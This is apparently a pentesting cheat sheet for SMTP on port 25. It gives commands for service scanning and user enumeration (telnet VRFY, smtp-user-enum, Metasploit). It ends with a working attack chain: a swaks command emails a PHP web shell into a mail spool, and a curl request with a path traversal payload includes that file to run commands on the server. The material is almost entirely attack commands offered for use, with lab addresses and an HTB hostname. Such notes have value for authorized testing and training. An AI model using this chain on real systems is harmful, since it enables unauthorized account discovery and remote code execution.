Skip to content

25 - Pentesting smtp

Nmap

nmap -p 25 -sV -sC -Pn 192.168.0.102
...
25/tcp    open  smtp    Postfix smtpd
...

Enumeration - Telnet

> telnet 10.0.2.5 25

> VRFY root
< 252 2.0.0 root

> VRFY szalek
< 550 5.1.1 <szalek>: Recipient address rejected: User unknown in local recipient table

> VRFY admin
< 550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table

> VRFY user
< 252 2.0.0 user

Enumeration - smtp-user-enum

smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $(target)
smtp-user-enum -M EXPN -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $(target)
smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $(target)
smtp-user-enum -M EXPN -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $(target)

Enumeration - Metasploit

use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set rhosts 10.10.200.211
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) > set USER_FILE /tmp/users.txt
msf auxiliary(smtp_enum) > run

Executing command

Send email

swaks --to asterisk@localhost --from admin@vtiger.htb --header "EmailHacked" --body 'BodyStart <?php system($_REQUEST["cmd"]); ?> BodyEnd' --server $(target)

Execute

curl -k 'https://10.129.84.70/file.php?file=../../../../../../../..//var/mail/UserName%00&cmd=id'